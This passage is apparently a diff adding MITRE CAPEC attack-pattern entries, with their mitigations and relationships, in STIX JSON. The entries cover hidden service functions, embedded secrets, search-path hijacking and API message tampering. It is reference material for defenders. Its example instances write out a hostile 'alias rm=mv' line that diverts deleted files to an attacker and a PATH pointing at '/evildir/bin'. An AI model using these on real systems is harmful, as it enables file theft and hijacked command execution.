+ "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify services: Discover a service of interest by exploring service registry listings or by connecting on a known port or some similar means.

    2. Techniques
    Search via internet for known, published services.
    Use automated tools to scan known ports to identify internet-enabled services.
    Dump the code from the chip and then perform reverse engineering to analyze the code.

  2. Authenticate to service: Authenticate to the service, if required, in order to explore it.

    3. Techniques
    Use published credentials to access system.
    Find unpublished credentials to access service.
    Use other attack pattern or weakness to bypass authentication.

  3. Identify all interfaces: Determine the exposed interfaces by querying the registry as well as probably sniffing to expose interfaces that are not explicitly listed.

    4. Techniques
    For any published services, determine exposed interfaces via the documentation provided.
    For any services found, use error messages from poorly formed service calls to determine valid interfaces. In some cases, services will respond to poorly formed calls with valid ones.

Experiment

  1. Attempt to discover unpublished functions: Using manual or automated means, discover unpublished or undocumented functions exposed by the service.

    2. Techniques
    Manually attempt calls to the service using an educated guess approach, including the use of terms like' 'test', 'debug', 'delete', etc.
    Use automated tools to scan the service to attempt to reverse engineer exposed, but undocumented, features.

Exploit

  1. Exploit unpublished functions: Using information determined via experimentation, exploit the unpublished features of the service.

    2. Techniques
    Execute features that are not intended to be used by general system users.
    Craft malicious calls to features not intended to be used by general system users that take advantage of security flaws found in the functions.
", + "x_capec_extended_description": "Adversaries can also search for undocumented bits on a hardware device, commonly known as \"chicken bits\". These bits are used to enable/disable certain functionality, but are not published. Adversaries can reverse engineer firmware to identify hidden features and change these bits at runtime to achieve malicious behavior.", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The architecture under attack must publish or otherwise make available services that clients can attach to, either in an unauthenticated fashion, or having obtained an authentication token elsewhere. The service need not be 'discoverable', but in the event it isn't it must have some way of being discovered by an attacker. This might include listening on a well-known port. Ultimately, the likelihood of exploit depends on discoverability of the vulnerable service." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. Web service digging tools may be helpful." + ], + "x_capec_skills_required": { + "Low": "A number of web service digging tools are available for free that help discover exposed web services and their interfaces. In the event that a web service is not listed, the attacker does not need to know much more in addition to the format of web service messages that they can sniff/monitor for." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Authenticating both services and their discovery, and protecting that authentication mechanism simply fixes the bulk of this problem. Protecting the authentication involves the standard means, including: 1) protecting the channel over which authentication occurs, 2) preventing the theft, forgery, or prediction of authentication credentials or the resultant tokens, or 3) subversion of password reset and the like.", + "id": "course-of-action--a7decf96-7bb3-45ee-bb7d-833b443b59ed", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-36-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fa411755-d981-4b14-9dbc-aed949041db7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a7decf96-7bb3-45ee-bb7d-833b443b59ed", + "spec_version": "2.1", + "target_ref": "attack-pattern--d0db3641-ee0d-4897-89aa-3c85c69377a5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker examines a target system to find sensitive data that has been embedded within it. This information can reveal confidential contents, such as account numbers or individual keys/credentials that can be used as an intermediate step in a larger attack.", + "external_references": [ + { + "external_id": "CAPEC-37", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/37.html" + }, + { + "external_id": "CWE-226", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/226.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "external_id": "CWE-525", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/525.html" + }, + { + "external_id": "CWE-312", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/312.html" + }, + { + "external_id": "CWE-314", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/314.html" + }, + { + "external_id": "CWE-315", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/315.html" + }, + { + "external_id": "CWE-318", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/318.html" + }, + { + "external_id": "CWE-1239", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1239.html" + }, + { + "external_id": "CWE-1258", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1258.html" + }, + { + "external_id": "CWE-1266", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1266.html" + }, + { + "external_id": "CWE-1272", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1272.html" + }, + { + "external_id": "CWE-1278", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1278.html" + }, + { + "external_id": "CWE-1301", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1301.html" + }, + { + "external_id": "CWE-1330", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1330.html" + }, + { + "description": "Data from Local System", + "external_id": "T1005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1005" + }, + { + "description": "Unsecured Credentials: Private Keys", + "external_id": "T1552.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1552/004" + } + ], + "id": "attack-pattern--55ce63d0-6143-4b95-b70c-87c5b60aafa8", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Retrieve Embedded Sensitive Data", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--3147f1c9-3043-40ca-ad42-c1be938820a4", + "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--d17eb5a5-1361-4e13-a969-e4d587d13b3d" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "Using a tool such as 'strings' or similar to pull out text data, perhaps part of a database table, that extends beyond what a particular user's purview should be.", + "An attacker can also use a decompiler to decompile a downloaded Java applet in order to look for information such as hardcoded IP addresses, file paths, passwords or other such contents.", + "Attacker uses a tool such as a browser plug-in to pull cookie or other token information that, from a previous user at the same machine (perhaps a kiosk), allows the attacker to log in as the previous user." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify Target: Attacker identifies client components to extract information from. These may be binary executables, class files, shared libraries (e.g., DLLs), configuration files, or other system files.

    2. Techniques
    Binary file extraction. The attacker extracts binary files from zips, jars, wars, PDFs or other composite formats.
    Package listing. The attacker uses a package manifest provided with the software installer, or the filesystem itself, to identify component files suitable for attack.

Exploit

  1. Retrieve Embedded Data: The attacker then uses a variety of techniques, such as sniffing, reverse-engineering, and cryptanalysis to retrieve the information of interest.

    2. Techniques
    API Profiling. The attacker monitors the software's use of registry keys or other operating system-provided storage locations that can contain sensitive information.
    Execution in simulator. The attacker physically removes mass storage from the system and explores it using a simulator, external system, or other debugging harness.
    Common decoding methods. The attacker applies methods to decode such encodings and compressions as Base64, unzip, unrar, RLE decoding, gzip decompression and so on.
    Common data typing. The attacker looks for common file signatures for well-known file types (JPEG, TIFF, ASN.1, LDIF, etc.). If the signatures match, they attempt decoding in that format.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "In order to feasibly execute this type of attack, some valuable data must be present in client software.", + "Additionally, this information must be unprotected, or protected in a flawed fashion, or through a mechanism that fails to resist reverse engineering, statistical, or other attack." + ], + "x_capec_resources_required": [ + "The attacker must possess access to the system or code being exploited. Such access, for this set of attacks, will likely be physical. The attacker will make use of reverse engineering technologies, perhaps for data or to extract functionality from the binary. Such tool use may be as simple as \"Strings\" or a hex editor. Removing functionality may require the use of only a hex editor, or may require aspects of the toolchain used to construct the application: for instance the Adobe Flash development environment. Attacks of this nature do not require network access or undue CPU, memory, or other hardware-based resources." + ], + "x_capec_skills_required": { + "Medium": "The attacker must possess knowledge of client code structure as well as ability to reverse-engineer or decompile it or probe it in other ways. This knowledge is specific to the technology and language used for the client distribution" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This pattern of attack sees an adversary load a malicious resource into a program's standard path so that when a known command is executed then the system instead executes the malicious component. The adversary can either modify the search path a program uses, like a PATH variable or classpath, or they can manipulate resources on the path to point to their malicious components. J2EE applications and other component based applications that are built from multiple binaries can have very long list of dependencies to execute. If one of these libraries and/or references is controllable by the attacker then application controls can be circumvented by the attacker.", + "external_references": [ + { + "external_id": "CAPEC-38", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/38.html" + }, + { + "external_id": "CWE-426", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/426.html" + }, + { + "external_id": "CWE-427", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/427.html" + }, + { + "description": "Hijack Execution Flow: Path Interception by PATH Environment Variable", + "external_id": "T1574.007", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/007" + }, + { + "description": "Hijack Execution Flow: Path Interception by Unquoted Path", + "external_id": "T1574.009", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/009" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--2e603682-c08c-4af1-8e06-329dc8bbe4b4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Leveraging/Manipulating Configuration File Search Paths", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Another method is to redirect commands by aliasing one legitimate command to another to create unexpected results. the Unix command \"rm\" could be aliased to \"mv\" and move all files the victim thinks they are deleting to a directory the attacker controls. In a Unix shell .profile setting\n alias rm=mv /usr/home/attacker\n In this case the attacker retains a copy of all the files the victim attempts to remove.\n ", + "\n A standard UNIX path looks similar to this\n /bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin\n If the attacker modifies the path variable to point to a locale that includes malicious resources then the user unwittingly can execute commands on the attackers' behalf:\n /evildir/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin\n This is a form of usurping control of the program and the attack can be done on the classpath, database resources, or any other resources built from compound parts. At runtime detection and blocking of this attack is nearly impossible, because the configuration allows execution.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The attacker must be able to write to redirect search paths on the victim host." + ], + "x_capec_skills_required": { + "Low": "To identify and execute against an over-privileged system interface" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ef4b6415-f24e-432a-9f51-eb19c515d326", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4112a44-a0f9-4bde-bebe-74ed96c4cd3f", + "spec_version": "2.1", + "target_ref": "attack-pattern--2e603682-c08c-4af1-8e06-329dc8bbe4b4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ensure that the program's compound parts, including all system dependencies, classpath, path, and so on, are secured to the same or higher level assurance as the program", + "id": "course-of-action--22eb9bea-93ce-4bec-b575-33aa10b6766a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-38-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f27d7fdd-9727-4b1e-852a-80cea8641b62", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--22eb9bea-93ce-4bec-b575-33aa10b6766a", + "spec_version": "2.1", + "target_ref": "attack-pattern--2e603682-c08c-4af1-8e06-329dc8bbe4b4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Host integrity monitoring", + "id": "course-of-action--58265fa6-0c01-42ec-a9a5-1e3535b9b8cb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-38-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c212a3ad-89fe-4eec-b57a-6c1471eb8a8a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--58265fa6-0c01-42ec-a9a5-1e3535b9b8cb", + "spec_version": "2.1", + "target_ref": "attack-pattern--2e603682-c08c-4af1-8e06-329dc8bbe4b4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary hosts an event within an application framework and then monitors the data exchanged during the course of the event for the purpose of harvesting any important data leaked during the transactions. One example could be harvesting lists of usernames or userIDs for the purpose of sending spam messages to those users. One example of this type of attack involves the adversary creating an event within the sub-application. Assume the adversary hosts a \"virtual sale\" of rare items. As other users enter the event, the attacker records via AiTM (CAPEC-94) proxy the user_ids and usernames of everyone who attends. The adversary would then be able to spam those users within the application using an automated script.", + "external_references": [ + { + "external_id": "CAPEC-383", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/383.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "external_id": "CWE-319", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/319.html" + }, + { + "external_id": "CWE-419", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/419.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + }, + { + "description": "Input Capture: Credential API Hooking", + "external_id": "T1056.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1056/004" + }, + { + "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18", + "external_id": "REF-327", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--2a8a634e-cf1f-4b2e-9a71-1ab8e6bb16d0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Harvesting Information via API Event Monitoring", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (The adversary is able to gather information to potentially support further nefarious activities.)" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Social Engineering", + "Software" + ], + "x_capec_prerequisites": [ + "The target software is utilizing application framework APIs" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage encryption techniques during information transactions so as to protect them from attack patterns of this kind.", + "id": "course-of-action--ef067fa3-03f9-4b2b-be2a-8afcd04006f5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-383-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c553bedf-6dd2-4f6e-bb3f-680cd65f2c57", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ef067fa3-03f9-4b2b-be2a-8afcd04006f5", + "spec_version": "2.1", + "target_ref": "attack-pattern--2a8a634e-cf1f-4b2e-9a71-1ab8e6bb16d0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker manipulates either egress or ingress data from a client within an application framework in order to change the content of messages. Performing this attack can allow the attacker to gain unauthorized privileges within the application, or conduct attacks such as phishing, deceptive strategies to spread malware, or traditional web-application attacks. The techniques require use of specialized software that allow the attacker to perform adversary-in-the-middle (CAPEC-94) communications between the web browser and the remote system. Despite the use of AiTH software, the attack is actually directed at the server, as the client is one node in a series of content brokers that pass information along to the application framework. Additionally, it is not true \"Adversary-in-the-Middle\" attack at the network layer, but an application-layer attack the root cause of which is the master applications trust in the integrity of code supplied by the client.", + "external_references": [ + { + "external_id": "CAPEC-384", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/384.html" + }, + { + "external_id": "CWE-471", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/471.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18", + "external_id": "REF-327", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--ea07b1ea-c1b0-4923-8d25-a8fc39da040a", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Application API Message Manipulation via Man-in-the-Middle", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--414d0884-4f46-4a51-b4ea-72125c7f5f9e" + ], + "x_capec_child_of_refs": [ + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--0a899aed-6271-4cc9-8ffc-5c9575776731", + "attack-pattern--33370ee8-a290-42cc-b85d-5fd13f1f6fed" + ], + "x_capec_prerequisites": [ + "Targeted software is utilizing application framework APIs" + ], + "x_capec_resources_required": [ + "A software program that allows a user to man-in-the-middle communications between the client and server, such as a man-in-the-middle proxy." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker hosts or joins an event or transaction within an application framework in order to change the content of messages or items that are being exchanged. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that look authentic but may contain deceptive links, substitute one item or another, spoof an existing item and conduct a false exchange, or otherwise change the amounts or identity of what is being exchanged. The techniques require use of specialized software that allow the attacker to man-in-the-middle communications between the web browser and the remote system in order to change the content of various application elements. Often, items exchanged in game can be monetized via sales for coin, virtual dollars, etc. The purpose of the attack is for the attack to scam the victim by trapping the data packets involved the exchange and altering the integrity of the transfer process.", + "external_references": [ + { + "external_id": "CAPEC-385", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/385.html" + }, + { + "external_id": "CWE-471", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/471.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18", + "external_id": "REF-327", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--0a899aed-6271-4cc9-8ffc-5c9575776731", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Transaction or Event Tampering via Application API Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ea07b1ea-c1b0-4923-8d25-a8fc39da040a" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "Targeted software is utilizing application framework APIs" + ], + "x_capec_resources_required": [ + "A software program that allows the use of adversary-in-the-middle communications (CAPEC-94) between the client and server, such as a man-in-the-middle proxy." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker manipulates either egress or ingress data from a client within an application framework in order to change the destination and/or content of links/buttons displayed to a user within API messages. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that looks authentic but contains links/buttons that point to an attacker controlled destination. Some applications make navigation remapping more difficult to detect because the actual HREF values of images, profile elements, and links/buttons are masked. One example would be to place an image in a user's photo gallery that when clicked upon redirected the user to an off-site location. Also, traditional web vulnerabilities (such as CSRF) can be constructed with remapped buttons or links. In some cases navigation remapping can be used for Phishing attacks or even means to artificially boost the page view, user site reputation, or click-fraud.", + "external_references": [ + { + "external_id": "CAPEC-386", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/386.html" + }, + { + "external_id": "CWE-471", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/471.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18", + "external_id": "REF-327", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--9df3addd-7bea-44e5-be63-4cc46d64fbea", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Application API Navigation Remapping", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--4343b267-a4f4-4adb-aa1c-48c79c992210", + "attack-pattern--9c41b3f7-76fa-4864-9b1d-304327dcd55c" + ], + "x_capec_prerequisites": [ + "Targeted software is utilizing application framework APIs" + ], + "x_capec_resources_required": [ + "A software program that allows the use of adversary-in-the-middle (CAPEC-94) communications between the client and server, such as a man-in-the-middle proxy." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary manipulates either egress or ingress data from a client within an application framework in order to change the content of messages and thereby circumvent the expected application logic.", + "external_references": [ + { + "external_id": "CAPEC-387", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/387.html" + }, + { + "external_id": "CWE-471", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/471.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18", + "external_id": "REF-327", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--4343b267-a4f4-4adb-aa1c-48c79c992210", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Navigation Remapping To Propagate Malicious Content", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9df3addd-7bea-44e5-be63-4cc46d64fbea" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_extended_description": "\n Performing this attack allows the adversary to manipulate content in such a way as to produce messages or content that look authentic but may contain deceptive links, spam-like content, or links to the adversarys' code. In general, content-spoofing within an application API can be employed to stage many different types of attacks varied based on the adversarys' intent. When the goal is to spread malware, deceptive content is created such as modified links, buttons, or images, that entice users to click on those items, all of which point to a malicious URI. The techniques require use of specialized software that allow the adversary to use adversary-in-the-middle (CAPEC-94) communications between the web browser and the remote system in order to change the destination of various application interface elements.\n ", + "x_capec_prerequisites": [ + "Targeted software is utilizing application framework APIs" + ], + "x_capec_resources_required": [ + "A software program that allows the use of adversary-in-the-middle communications between the client and server, such as a man-in-the-middle proxy." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker manipulates either egress or ingress data from a client within an application framework in order to change the destination and/or content of buttons displayed to a user within API messages. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that looks authentic but contains buttons that point to an attacker controlled destination.", + "external_references": [ + { + "external_id": "CAPEC-388", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/388.html" + }, + { + "external_id": "CWE-471", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/471.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-602", + "source_name": 